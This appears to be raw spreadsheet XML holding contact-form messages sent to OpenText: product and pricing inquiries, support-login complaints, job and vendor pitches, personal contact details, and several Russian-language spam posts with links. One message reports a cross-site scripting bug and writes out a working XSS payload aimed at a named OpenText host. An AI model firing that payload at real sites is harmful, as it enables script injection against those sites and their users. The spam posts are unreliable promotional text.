_x000D_
_x000D_
Best regards,_x000D_
Komal</t>
  </si>
  <si>
    <t>My access is not letting me in the support and KB area.  I need this resolved ASAP.</t>
  </si>
  <si>
    <t>Exploring Asset Management Platforms.  Curious about Open Text as a Modular platform_x000D_
 NOT Cloud....— DAM capabilities that can be acquired stand-alone or as part of a broader suite of tools that include such elements as web content management, app development, forms and records management, enterprise collaboration, and workflow.</t>
  </si>
  <si>
    <t>We would like to look into demo'ing eDocs DM for our Legal Service.</t>
  </si>
  <si>
    <t>I am currently researching GSA replacement possibilities. If that is something within the scope of what your company offers, please contact me vial email._x000D_
_x000D_
Thanks,_x000D_
LK</t>
  </si>
  <si>
    <t>hey there are a bug on your website ._x000D_
Xss Bug here : -https://tatproddel105.tat.cloud.opentext.com/v/index.jsp?vgnextoid=d13cd68cb21f0510VgnVCM100000164d8d0aRCRD&amp;vgnextfmt=default&amp;vgnextlocale=xss%22%3E%3Csvg/onload=prompt(/XSSBYCHIRAG/)%3E_x000D_
_x000D_
after fixing give me reward</t>
  </si>
  <si>
    <t>Hello! I am interested in some information regarding your notification options and would like to have someone contact me to discuss your processes/systems and available options._x000D_
Thanks you, Chris.</t>
  </si>
  <si>
    <t xml:space="preserve">Contact information for an OpenText Federal Representative </t>
  </si>
  <si>
    <t>We are currently using Gupta TD 6.2 platform and want to upgrade to 6.3/7.0. Request a quotation for Developer/Server/End User licenses.</t>
  </si>
  <si>
    <t>Investigating solutions for record management and public information requests.</t>
  </si>
  <si>
    <t>Access is the second largest records management company in US with over 80 facilities.  We are a group of service bureaus looking at capture and hosting options and would like to discuss.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Accurate Background, Inc. is a background screening company, and we would like to verify details submitted by a person who listed your company as employer . We ask you please provide us with the person/department in charge of verify. _x000D_
 _x000D_
Thank you in advance for your time and cooperation._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Laura Moreno_x000D_
International Verifications Researcher_x000D_
Direct Line: (949) 609-0155 Ext. 408_x000D_
Main Office: (800) 784-3911 _x000D_
Fax: (800) 784-3593_x000D_
UK Toll Free Customer Service Number 00-800-2224-3252  _x000D_
UK Fax:  +44 20 7900 2157_x000D_
accuratebackground.com_x000D_
</t>
  </si>
  <si>
    <t>We have a old version of eroom (ver 7.34) and I need a quote if we were to move this to a up to date cloud solution.</t>
  </si>
  <si>
    <t>Ron, I have one more question opening CD's. It should not take more than 5 minutes. Please give me a call between 1 and 2 or after 3:30. Thanks!</t>
  </si>
  <si>
    <t>Can this certification help me get a job?</t>
  </si>
  <si>
    <t>We are a reseller software located in Mexico City, and we have a customer who are interested to purchase Qfiniti Observe Voice and Screen Module Call Center (Agents Maintenance) for 15 users. _x000D_
_x000D_
We want to know if we can sell your products in Mexico. Please send me the product's information as: _x000D_
_x000D_
Price List: _x000D_
Discount reseller: _x000D_
Payment methods: _x000D_
Delivery methods: _x000D_
_x000D_
If you need additional infomation please let me know or visit our website at: www.multion.com _x000D_
_x000D_
Many thanks in advance._x000D_
_x000D_
Joel Cervantes R. _x000D_
Sales Manager LATAM_x000D_
+5255 55594050 ext. 119</t>
  </si>
  <si>
    <t xml:space="preserve">Hi everybody,_x000D_
_x000D_
We are a company from group Mubadala Development Company, and we are very interesting on to know else about your company._x000D_
We have to implementation of document control on our company, as well we want to know about your software features._x000D_
We might get in touch so soon you received my e-mail_x000D_
Please feel free on call to me or our Project coordinator Jhon Calvo jhon.calvo@minesa.com him has the same account by skype for business too._x000D_
</t>
  </si>
  <si>
    <t>I urgently need to log a support call on my company contract, and the system does not allow me to.</t>
  </si>
  <si>
    <t>From time to time we view .tiff images that contain up to 960 pages each, which Brava! Reader handles fine. Am I to understand the free Brava! Reader will no longer be able to open/read these files any longer? Our purpose only is to read them. No editing is involved in any way. If we were to upgrade to the Pro version, how much would 3 computers cost, and would there be an annual maintenance fee just the first year or every year thereafter?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Terry</t>
  </si>
  <si>
    <t xml:space="preserve">Preciso de um Treinamento da ferramenta de VIM da Open Text para meus funcionários. </t>
  </si>
  <si>
    <t xml:space="preserve">Software download via "Opentext - My Support" site is currently locked for me and my colleague Ahmed ASSOUS. We need to download products like Documentum server in order to upgrade our platform. This was previously possible for us via EMC site, but now locked on Opentext site. Could you please grant us the download priviledges OR let me know how to proceed to activate the functionality?_x000D_
_x000D_
Thanks and regards,_x000D_
Siaka D. </t>
  </si>
  <si>
    <t>Please can you advise where I can look to purchase Brava Reader from a UK provider?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>SSAE 16 (SOC 1) Report - Client's bank (Citi) utilizes services from OpenText. Need to assess controls for financial statement audit. URGENT REQUEST</t>
  </si>
  <si>
    <t>I need access to be able to log for service request for my company contract</t>
  </si>
  <si>
    <t>We just seen that the free Brava Reader will expire in April of this year.  _x000D_
Can you give me a price on how much it would be per license or bundle._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>We did work for Corechange in the past. We manufacture custom shipping cases. If you need a custom case we would be happy to quote for you. our last contact was Jessica benoint</t>
  </si>
  <si>
    <t>Request to get permission to open a ticket on the portal support.</t>
  </si>
  <si>
    <t>PROVIDE THE DOWNLOAD LINK FOR IRM CLIENT FOR PDF. _x000D_
http://documentum.opentext.com/documentum-information-rights-managment/software/_x000D_
The above link DOESN'T WORK</t>
  </si>
  <si>
    <t>Hello. I'd like to know what are the differences between the 3-2020 OpenText Extended ECM for SAP Solutions Foundation v16 and 3-2020 OpenText Extended ECM for SAP Solutions Foundation v10.5._x000D_
Beacause they have the same name ( except for the version) but the descriptions are totally different. _x000D_
For the first we have a short description, for the second more and more. So I'd like to know if the arguments of the bootcamp for xECM v10.5 is included into the bootcamp for v16. or not, and what is exactly treated into the bootcamp v16. _x000D_
The descriptions are below, the first for v16, the second fot 10.5: _x000D_
1)_x000D_
"Highlights:_x000D_
_x000D_
Smart UI_x000D_
Configuration and administration_x000D_
Solution Accelerators_x000D_
Introduction to Records Management_x000D_
Hands on exercises_x000D_
Certification Exam_x000D_
On completion of this course, participants should be able to:_x000D_
_x000D_
Describe the Extended ECM for SAP Solutions value proposition and business scenarios_x000D_
Describe the components and architecture of the solution_x000D_
Explain the Records Management functionality_x000D_
Configure Extended ECM for SAP Solutions_x000D_
Perform routine administrative tasks and troubleshoot common problems_x000D_
Effectively utilize the Unified Repository_x000D_
Locate and install Solution Accelerators"_x000D_
_x000D_
2)_x000D_
"Introduction: What is Extended ECM for SAP Solutions?_x000D_
_x000D_
Value Proposition_x000D_
Business Scenarios_x000D_
Components &amp; Architecture_x000D_
_x000D_
Archive Server_x000D_
Content Link_x000D_
Content Server_x000D_
Enterprise Library Services_x000D_
Integration (ECMLink)_x000D_
ECMLink Configuration_x000D_
_x000D_
Business Workspaces, References and Relationships_x000D_
Business Policies_x000D_
Workspaces in SAP DocuLink Views_x000D_
Integrate SAP ArchiveLink Documents in Extended ECM_x000D_
Administration_x000D_
_x000D_
Overview_x000D_
Troubleshooting_x000D_
Project Work and Exam_x000D_
_x000D_
Conceptual Exercise_x000D_
Presentation_x000D_
Certification Exam"</t>
  </si>
  <si>
    <t>i forgot that i had a login.  So, i went to reset the password.  The system would not let me change it.  It kept saying that there was an error, but did not specify what the error was.</t>
  </si>
  <si>
    <t>I am supporting IT persons for  career development  in Japan by volanteer._x000D_
I have the candidate  for your legal position in Japan._x000D_
Would you let me know whom I should contact and send his resume?_x000D_
Your kind reply would be highly appreciated._x000D_
regards,_x000D_
Sadayuki Nomura</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get consultancy regarding standard functionality of Open Text. </t>
  </si>
  <si>
    <t>We are trying to create new items in a  Data Pool/catalogue for sear holding Vendor portal.  What information do you need and how is the process to create new items using your services.</t>
  </si>
  <si>
    <t>Can you please let me know if rightfax has a repeat  callback feature if the fax line is busy or not responding if so how many times does it retry to send the fax.</t>
  </si>
  <si>
    <t>I'm part of the IT Team of Cofra Holding. Cofra Holding is a new customer of you. Can you please send me an example of a booking confirmation, I will check if they landing in the Outlook Spamfolder or not._x000D_
Thanks_x000D_
Kind regards_x000D_
Reto Hofmann_x000D_
Cofra IT Team</t>
  </si>
  <si>
    <t xml:space="preserve"> ШведскаястенкаЭктаPro3Эктаспорт, СК- 3 , Беларусь  ШведскаястенкаЭктаPro3 . Доставка по Москве. или до терминала ТК в  при получении отвара.  /shvedskaya-stenka-ekta-pro3 &lt;br&gt; &lt;i&gt;Детскоенавесноеоборудованиедляшведских стенок. &lt;/i&gt;.&lt;br&gt;  _x000D_
 [URL=http://shved-stenki.ru/detskij-sportivnyj-kompleks-gorodok-pristennyj-s-setkoj/]Детский спортивный комплекс городок пристенный с сеткой[/URL] [URL=http://shved-stenki.ru/shvedskaya-stenka-uralmash/]Шведская стенка уралмаш[/URL]  _x000D_
 &lt;h4&gt;Шведскаястенкакомпактная. Тренажерный зал  -  &lt;/h4&gt;.&lt;br&gt; &lt;h3&gt;Как сделать шведскую стенку своими руками? &lt;/h3&gt;.&lt;br&gt;  _x000D_
детский спортивный комплекс в кввартиру своими руками из дерева _x000D_
 _x000D_
 &lt;strong&gt;Купить шведскую стенку для детей с доставкой по всей Росиии &lt;/strong&gt;.&lt;br&gt; &lt;i&gt;Шведскиестенкивкварртируот  - &lt;/i&gt;.&lt;br&gt;  _x000D_
  [URL=http://shved-stenki.ru/detskaya-shvedskaya-stenka-s-krepleniem-k-stene-kupit-v-moskve/]Детская шведская стенка с креплением к стене купить в москве[/URL] [URL=http://shved-stenki.ru/detskij-sportivnyj-kompleks-malysh-kiev/]Детский спортивный комплекс малыш киев[/URL]  _x000D_
 &lt;i&gt;Шведские стенки &lt;/i&gt;.&lt;br&gt; &lt;strong&gt;Шведские стенки — купить по низким ценам в интернет-магазине &lt;/strong&gt;.&lt;br&gt;  _x000D_
детский спортивный комплекс формула здоровья атлант _x000D_
 _x000D_
&lt;h2&gt;Элемент «флажок»нашведскойстенке Men's Health Россия &lt;/h2&gt;.&lt;br&gt; &lt;h4&gt;ШведскаястенкаПионеркупить в Москве &lt;/h4&gt;.&lt;br&gt;  _x000D_
[URL=http://shved-stenki.ru/detskij-sportivnyj-kompleks-v-kazani/]Детский спортивный комплекс в казани[/URL] [URL=http://shved-stenki.ru/detskij-sportivnyj-kompleks-amaster-2-1/]Детский спортивный комплекс amaster 2/1[/URL]  _x000D_
&lt;i&gt;Сборкаи установкашведскойстенкисмотреть онлайн на Ютубе &lt;/i&gt;.&lt;br&gt; Маты гимнастические в Екатеринбурге  Моя радсоть   подвижных игр и занятия физкультуройдлядетей. Идельно подходитдлядомашего использования под Шведскую стенку. Чехол: синтетичес..  /sportivnye-tovyry/mat-gimnasticheskij/ &lt;br&gt;  _x000D_
шведская стенка оптимальный раземр _x000D_
 _x000D_
 &lt;strong&gt;Спортивный комплексШведскаястенка, спортивный уголок </t>
  </si>
  <si>
    <t>I need to have my support access to create D2 related tickets with open text D2 support team._x000D_
_x000D_
Kindly provide me the steps to have a my support access</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Hope you are doing well._x000D_
_x000D_
We are offering the below mentioned services at modest rate. We have a dedicated team on the below mention services with over 7 years of experience and we thrive on the idea that design makes a difference._x000D_
_x000D_
 Our services are:-  _x000D_
 1. Website development (Custom Website Development, PHP Programming, etc.)_x000D_
 2. Website designing (HTML designing, corporate website design, PSD to XHTML/HTML, etc)_x000D_
 3. Open source customization (CMS : Codeigniter, joomal, wordpress, etc)_x000D_
 4.  Ecommerce website development_x000D_
 5. Web Programming Services (PHP MySQL Development, PHP Frameworks, JavaScript Frameworks etc)_x000D_
 6. Android Application Development ( Android phone and tab)_x000D_
 7. iPhone Application development ( iPhone / iPad application )_x000D_
_x000D_
All Services are available on Very affordable Price._x000D_
_x000D_
Please let us know if you are interested to discuss any of these things share me your Contact/Skype. I will send you more details on the packages/action/Portfolio/past work details._x000D_
_x000D_
We can schedule a call for better understanding of your requirement. Please share your availability to connect._x000D_
_x000D_
I am waiting for your reply._x000D_
_x000D_
* Contact information _x000D_
Email : info@conceptioni.com_x000D_
Skype : conception.i_x000D_
Web : www.conceptioni.com_x000D_
 _x000D_
Kinds Regards,_x000D_
Jemil Rathod _x000D_
Conception I Technology_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please share the contact details from your end to be included in our RFP release vendor list of Enterprise Content Management.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi , Thanks for contacting us for your email requirement. Neil cox from our parent company will send you more information on the same. _x000D_
_x000D_
Regards,_x000D_
Lydia_x000D_
_x000D_
 _x000D_
Hi, are you looking for prospects list for your marketing campaign?  We have 2,934  AS400 Customers from  France._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear colleagues,_x000D_
_x000D_
Initial Coin Offerings and token distribution events have gained impressive popularity around the world due to fundraising simplicity and the excitement around blockchain and cryptocurrencies._x000D_
_x000D_
ICO SUMMIT KAZAN will be held on April 10-11, 2018 in Innopolis (Kazan, Russia) and will provide an excellent venue to showcase the best ongoing ICO's, listen to best speakers, gain new knowledge, share ideas and accomplish fundraising._x000D_
_x000D_
The event will be opened with a pre-day Startup Academia, open only to startups planning or doing an ICO. Attending projects will be coached by our world’s famous speakers in technical aspects of ICO preparation and implementation, legal and regulation issues of ICO procedures and will learn how to present ICO to investors and backers._x000D_
_x000D_
2-day Summit will cover a wide range of ICO topics including legal and regulation, token sale economy and mechanics, investing, risks, and much more. Conference will offer panel discussions and sessions about opportunities of ICO's in Public and Private Sectors. A special section would be devoted to a blockchain in HealthCare._x000D_
_x000D_
The "Pitch Your ICO" competition is a unique opportunity for all Summit attendees to hear from the founders about the newest and hottest upcoming ICO’s. Each team will have 7 minutes of the main stage prime time to present their ICO, answer questions and hear feedback from world-class jury panel. All finalist teams will receive a one-on-one coaching from Summit experts and compete for the $10,000 TOP prize._x000D_
_x000D_
ICO teams and sponsors will have an opportunity to set a booth in the Exhibitor Hall for further networking opportunities._x000D_
_x000D_
ICO Summit Kazan expects over 500 participants, 50+ ICO startups, 80+ investors and international journalists, when it takes place in April this year. ICO Summit Kazan is the Eastern Europe's biggest ICO showcase, competition and conference._x000D_
_x000D_
To find the latest news and agenda updates, or to register as a sponsor, ICO startup, </t>
  </si>
  <si>
    <t>We would like a OpenText Content Suite trial to enable access to the API as a developer partner. Kloudless builds unified APIs and we have a request for OpenText from a mutual customer we would like to resolve. Please contact me ASAP so we can get started. Thanks!</t>
  </si>
  <si>
    <t>I would like to ask if our vendor can apply for this website to download related photo. Thank you.</t>
  </si>
  <si>
    <t>I read about Open Text and liked what I read to the tune of personally investing $50,000. My company is in dire need of real time data so we can make informed decisions on the fly but I am not sure where to start. My own IT guys are just not responding to my data demands. So I am left to wonder if Open Text can help or maybe Splunk? I have been searching for a bolt on data driver company like Open Text without having to replace my entire ERP. My newest business manta is “We cannot manage without measuring”. By this I mean all of my managers need accurate and real time data through measuring critical KPI’s to make informed decisions and change course because the data is telling them their department is running outside of established budgetary goals. But instead I sit around month after month with an bunch of open mouth breathers, eyes glazed over slumped down in a naval gazing posture whenever I ask for answers as to why my company is performing like crap. No data until after the horse has left the barn and no sense of urgency from all top managers.</t>
  </si>
  <si>
    <t>Can i know the price of iHub 16 pro edition? Or can you suggest me which version suits better? My requirements are:_x000D_
1) Make the BIRT webViewer accessible to end-user?_x000D_
2) Download reports as CSV and PDF_x000D_
3) Ad-hoc reporting features</t>
  </si>
  <si>
    <t>Need support for Scanner selection._x000D_
For our client implementing opentext VIM 7.5. they are new to S/4HANA migrating from Legacy system._x000D_
_x000D_
Kindly Suggest the best Scanner for their business purpose._x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Regards,_x000D_
Praveenkumar_x000D_
+61 0458960361</t>
  </si>
  <si>
    <t>Interested in Documentum. Would like to know more about it and how it can help us ib the business.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I would like to raise a support request for OpenText Dialogue. I would like to know if our support request ID has been transferred across from HP and whether it is still valid._x000D_
_x000D_
Regards_x000D_
Aaron</t>
  </si>
  <si>
    <t>TeamSite virtual infrastructure requirement for Ed.gov upcoming procurement.</t>
  </si>
  <si>
    <t>[url=https://botlab.su/136-pages/elements/analiz-tsen/365-monitoring-konkurentov][img]https://botlab.su/images/uslugi/analiz-cen_1.png[/img][/url] _x000D_
 _x000D_
[u][b]таблица мониторинг цен конкурентов[/b][/u], очень нужен для того, что бы знать, что происходит на рынке. Компания, которая не занимается таким мониторингом, рискует лишиться очень большого количества покупателей по причине неконкурентоспособной стоимости, а так же немалой части заработка, по причине закупок  у продавца, предлагающего цены выше, чем предлагают лругие, на этот товар. Предлагаем вам [url=https://botlab.su/136-pages/elements/analiz-tsen/365-monitoring-konkurentov]таблица мониторинг цен конкурентов[/url]</t>
  </si>
  <si>
    <t>Looking to replace out existing faxing solution and also need one that will work with our new EHR implementation.</t>
  </si>
  <si>
    <t>We are unable to login to Vista Plus Web Application, it is keep spinning</t>
  </si>
  <si>
    <t>We contacted OpenText for an opportunity to evaluate the ECM / CCM Products and Terra Lynne Herd &lt;therd@opentext.com&gt; / Richard Enright &lt;renright@opentext.com&gt; engaged in initial discussions.  However, there is no response on their presence for Demo / Technical Discussions.  We need someone who can take this and proceed further.  Needs to be done at the earliest.</t>
  </si>
  <si>
    <t>I need help in downloading trial version of OpenText NFS Client</t>
  </si>
  <si>
    <t>I need to get to our Easy Link Fax2Mail portal_x000D_
_x000D_
Group # 905982_x000D_
_x000D_
User # 905981_x000D_
And I cannot get a logon to work</t>
  </si>
  <si>
    <t>I am seeking a software system to assist our legal team.  My organization, Getinge, currently lacks a comprehensive legal management system. My role as project manager is to aid our legal team in finding a solution.  Our primary focus is to implement a global system which can help the organization organize and manage existing and new contracts._x000D_
_x000D_
We are currently exploring various vendors of choice to determine which solution may best fit our needs.  In order to do so, we are requesting a demo of your product to evaluate its capabilities against our requirements.  _x000D_
 _x000D_
Please contact me to arrange a date and time for an introduction call.</t>
  </si>
  <si>
    <t xml:space="preserve">I need some technical with Teleform. We have 2 active licenses, but haven't used the software for a little while. Just starting a new project, and nothing seems to work any more... :-)_x000D_
Can I upgrade to a newer version? How does your technical support work and whom can I call?  Do I need a service contract?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Heike Gibson  </t>
  </si>
  <si>
    <t>I have been using Brava Reader TIFF and now it is not available free.  my question: is the desktop reader the same thing and what it the difference between the 49.00 in the and the 115.00 one</t>
  </si>
  <si>
    <t>Hi,Please Advise if DM Extensions 5.31.674 is supported on Windows10._x000D_
Thanks,</t>
  </si>
  <si>
    <t>_x000D_
Hello, I am wondering if you have anytype of case management software that would meet our needs. We are a property management firm with 16,500 units and are looking for a software where we can manage all our ongoing insurance matters (liability and property damage)</t>
  </si>
  <si>
    <t>Ранее постельное белье считалось предметом роскоши, сегодня же это необходимый элемент повседневного использования. Современные производители регулярно наполняют рынок всё новыми и новыми предложениями, в большом выборе не трудно и растеряться, подробнее об этом читайте на сайте [url=http://shoptrip.ru]shoptrip.ru[/url]</t>
  </si>
  <si>
    <t>Do you provide any discounts for academic usage? We are going to implement of NAPA for teaching of Naval Architecture.</t>
  </si>
  <si>
    <t>We are setting you up in our system as a new vendor and I need to obtain your remit-to address for payments by check. Thank you</t>
  </si>
  <si>
    <t>We interested in seeing how much it would be to set up a fax service for our employees to use.</t>
  </si>
  <si>
    <t>trying to purchase TX.   Order form indicates "Some errors were found" but in no way indicates what those errors are.  Have tried to do this from three different computers.  Phone contact sucks.  Every time I try to connect to sales the call is disconnected.  Do you want to make sales or not?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Having recently graduated from SKEMA Business School in France, I am taking the opportunity to contact you as I am highly interested in an internship position of 3 months in your company in Finland. _x000D_
_x000D_
It would be an outstanding opportunity for me to enter OpenText and to keep on growing and developing the skills I learnt during my studies. I have a double degree of European business law and management, which provides me with a multipurpose profile and allows me to adapt myself to the different fields I have the opportunity to work on. _x000D_
_x000D_
I am a cheerful, rigorous and a hard-working person. I am also very committed to my work and I am good at working as a member of a team. As a fast-learner, I am always eager to learn more in order to improve my skills. _x000D_
_x000D_
To this end, please contact me if you are interested to see my resume. _x000D_
_x000D_
I thank you in advance for your consideration of my enthusiasm to work at OpenText._x000D_
_x000D_
Yours faithfully,_x000D_
_x000D_
Lamia ALAMI HAMDOUNI</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon- we are  looking into attending the Enterprise World 2018 conference in July and the number of representatives that we sign up will be dependent on the program schedule. I see on your website that the program  schedule should be available early January. Do you know if this will be ready soon? Thank you! </t>
  </si>
  <si>
    <t>I would be interested in how much it costs for a booth at the conference._x000D_
Thanks</t>
  </si>
  <si>
    <t>We have an older version of Application Xtender that we would like to export files out of. The problem we are having is that the files were stored with compression for speed and size, and are stored in a bin format that begins with COM1.0. We are unable to open these files in any viewer besides the application extender document retrieval program. Do you offer a conversion software? We would like to export these files to PDF, or TXT files. We have a current maintenance agreement for our software with a company called Imaging Office Systems, who is a reseller of your product._x000D_
_x000D_
Thanks_x000D_
_x000D_
Adam</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
we are evaluating solutions that could replace our current SAP conversion server. _x000D_
_x000D_
We need the following : _x000D_
_x000D_
An automated server that _x000D_
_x000D_
-	accepts input of pdf, tif, autocad, inventor files from SAP DMS and / or storage vault_x000D_
-	outputs them to pdf upon a status change_x000D_
-	Stamps and watermarks the resulting pdf depending of the file status. _x000D_
-	Provides a cockpit to monitor the conversions of mentionned files. _x000D_
_x000D_
A tool to :_x000D_
-	massively import pdf, tif, autocad, inventor files to the storage vault.  _x000D_
-	massively  export files from the storage vault  _x000D_
_x000D_
Does opentext provide tools that could do this job?_x000D_
_x000D_
Thanks and regards, _x000D_
_x000D_
Brad Landry</t>
  </si>
  <si>
    <t xml:space="preserve">currently Right Fax 10.6 looking for cloud based solutions.    _x000D_
email to schedule a call to discuss._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My Team will be taking on Production support of the Opentext Application Suite and I wanted to learn more about product training, white papers, architecture. </t>
  </si>
  <si>
    <t>Requesting a 30day demo of RightFax</t>
  </si>
  <si>
    <t>Ron, it is downloaded. Please call me at your convenience.</t>
  </si>
  <si>
    <t>Can you tell me what the equivalent cost is in the UK please.</t>
  </si>
  <si>
    <t>Is there a free version of Brava reader that doesn't expire after 15 days.  I only look at drawings, I don't have a need to alter or print them.  Thank you.</t>
  </si>
  <si>
    <t>Please direct me to Gupta ODBC Download for 11.7, we have a licenced system "AuditBase" by AuditData, the 32bit driver with works using localhost on the server,  but from PC to Server it fails with an error.08001..Please advise and Many Thanks Sharon</t>
  </si>
  <si>
    <t xml:space="preserve">Information about Open Text Infofusion Integration Center (Ex OTIC/Genio), road map, last version and what's new since OTIC 8.2_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind ein mittelständisches Unternehmen und auf der Suche nach einer geeigneten ECM Lösung für unseren Betrieb. Daher würden wir uns für Ihre Produkte interessieren. Bitte nehmen Sie Kontakt mit uns auf oder verweisen Sie uns an einen entsprechenden Händler, der unsere Fragen beantworten kann. _x000D_
_x000D_
MfG _x000D_
Fabian Fügen _x000D_
</t>
  </si>
  <si>
    <t>Hi - your website indicates you've done integrations with Mitel in the past, but as a product manager for our contact center solutions, I have no records of this being vetted or done in conjunction with Mitel. Could you please put me in touch with a product owner or partner relationship manager so we can discuss what you have that integrates with Mitel? I have a customer in AUS that is interested._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>OpenText HostExplorer (EHLLAPI/COM API) - formerly known as "Hummingbird"._x000D_
_x000D_
I would like some info about the product and prices for 5-8 licenses._x000D_
Do you have an agent/vendor in Norway?_x000D_
I'm looking forward to your hopefully quick answer, thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">When sending fax2mail we are getting the following error._x000D_
Fax job 46698950 cancelled - Unrecognized input near line 2. The next few printable characters are: FROM smamuni@allianc_x000D_
User number 2881976, an error was encountered by the system processing your request._x000D_
The system is unable to parse enough information to generate_x000D_
your normal cancel report. This message was not delivered. If you want this_x000D_
message to be delivered, please correct the error and enter it again._x000D_
_x000D_
The cause of the error was:_x000D_
_x000D_
Unrecognized input near line 2. The next few printable characters are: FROM smamuni@allianc_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I represent the Procurement department at Hempel. We are a global company within the coatings industries and are headquartered just outside Copenhagen, Denmark. _x000D_
_x000D_
I have received a request from our legal department. They are interested in a case management system. Your DOCS system could be a solution for this. _x000D_
_x000D_
We are interested in arranging a Skype-demo of your product and receive additional information. _x000D_
_x000D_
Please inform a commercial contact for further clarification. _x000D_
Looking forward to hear from you. _x000D_
</t>
  </si>
  <si>
    <t>I am interested in buying Team Developer 7.0 licenses for my team of developers._x000D_
Our company is located in Lima, Peru._x000D_
I would appreciate if you could indicate, in what way I can acquire these licenses._x000D_
_x000D_
Regards,_x000D_
_x000D_
Sergio Untiveros.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in your OpenText system. One of our colleagues uses it for electronic personnel files. </t>
  </si>
  <si>
    <t>We are a Pharma CDMO with a global network of manufacturing sites in Europe as well as in Canada. We are now exploring our options for a global Electronic Document Management System (EDMS), which would preferably be linked with an E-training system. We are looking for a system fully compliant with EU and 21 CFR Part 11, also including reconciliation of documents and links between EDMS and E-Training to ensure that a user can only access controlled documents (SOP's etc.) for which has been trained on. We developed our URS, and we look forward to discussing with your commercial team, the possibility of implementing Documentum + E-Training at FAMAR.</t>
  </si>
  <si>
    <t>Hello Sir/Madam,_x000D_
_x000D_
Greetings from Vaizone!_x000D_
_x000D_
We are a systems integrator and a Management consulting company with offices in Tunis, Tunisia. For an RFP from a major company in Tunisia, we are processing right now, we contact you today. We would like to inquire about your interest in a joint bid you Opentext (ProVision) along with Vaizone. Vaizone was founded in 2013, coupled to our expertise and understaing of this region we operate in, we have earned during our 5 years of activity the know-how and the expertise in the conduct of end-to-end IT projects, we know how to bring projects to the end-line successfully. Today, we aim to have you as a partner in this bid which purpose is 'The supply of an IT Roadmap' and others that will come we are sure._x000D_
_x000D_
We look forward to have further discussions with you and to bring this inquiry to fruition. Your prompt response will be most appreciated._x000D_
_x000D_
_x000D_
P.S: Sorry for the previous inaccurate version of this e-mail._x000D_
_x000D_
Best Regards._x000D_
_x000D_
Mahdi Cherif._x000D_
Business Development Manager._x000D_
Vaizone Solutions._x000D_
Don't Reinvent the Wheel, Make it Faster!_x000D_
Tél: +216 97 88 39 28/+216 55 585 894_x000D_
Landline: +216 71 607 380_x000D_
Telecopie/Fax: +216 71 660 122_x000D_
cherif.mahdi@vaizones.com_x000D_
www.vaizones.com</t>
  </si>
  <si>
    <t>We are looking for a enterprise content management solution to meet our requirements. We need to explore open text as an option.</t>
  </si>
  <si>
    <t xml:space="preserve">my support loging return everytime backup with asking confirm mail </t>
  </si>
  <si>
    <t>Hi, I found a video of yours on Youtube called "Converting Lotus Notes Application to .NET" and I am interested in getting to know more about this process._x000D_
Do you still provide that service? If so, I would like to get a quote for migrating some of our Lotus Notes applications (let's say 10 for now) to .NET. _x000D_
Kind regards_x000D_
Valentino</t>
  </si>
  <si>
    <t xml:space="preserve">please let me know the easiest way to activate Exceed license bought from the reseller ArFlex. </t>
  </si>
  <si>
    <t>Grüsse Sie,_x000D_
_x000D_
Wir sind auf der Suche nach einem DMS System._x000D_
_x000D_
Bitte um Kontaktaufnahme._x000D_
_x000D_
_x000D_
mit freundlichen Grüssen_x000D_
David Müller</t>
  </si>
  <si>
    <t>Hi,_x000D_
Wanted to know if TeamSite / OpenText offers AMP Plugins in the CMS. _x000D_
Regards,_x000D_
Sujith.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get the address of  a friend who is working in your company. Mr Riaz Salam .Billing Collection specialist ._x000D_
Please inform him to contact me urgently._x000D_
Thanks best regard_x000D_
Pervez mazhar_x000D_
Slovenian national_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">HI,I am the manager fro ceasefire industries,we have a new product for server protection systems,This product namely CEASEFIRE QUICK RESPONSE SYSTEM (CQRS),regarding this product i am asking appointment,so please give me your valuable time to explain our product,thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
J'ai acheté 2 licenses EXCEED et SECURE SHELL que je n'arrive pas à télécharger depuis votre site internet._x000D_
J'ai pourtant un compte opentext  et j'ai bien reçu les numéros de license avec le packing slip._x000D_
le menu "download software" est verrouillé._x000D_
Je suis joignable au 0321004943._x000D_
Merci par avance._x000D_
P. Dubois_x000D_
</t>
  </si>
  <si>
    <t>Advise any patches require for Meltdown and Spectre on the OpenText Applications - OTAS, OTICC, OTWV</t>
  </si>
  <si>
    <t>where to buy in malaysia?</t>
  </si>
  <si>
    <t>Currently looking for digital asset management system, want to get more detailed info regarding OpenText Media Management features and capabilities.</t>
  </si>
  <si>
    <t>Need help with producing a Destroy Report</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to know more about your services. We would like to  have a demo onsite if possible._x000D_
_x000D_
Regards_x000D_
</t>
  </si>
  <si>
    <t>request for quotation: Digital Right Management license</t>
  </si>
  <si>
    <t>Pls help to open the permissions of My Support</t>
  </si>
  <si>
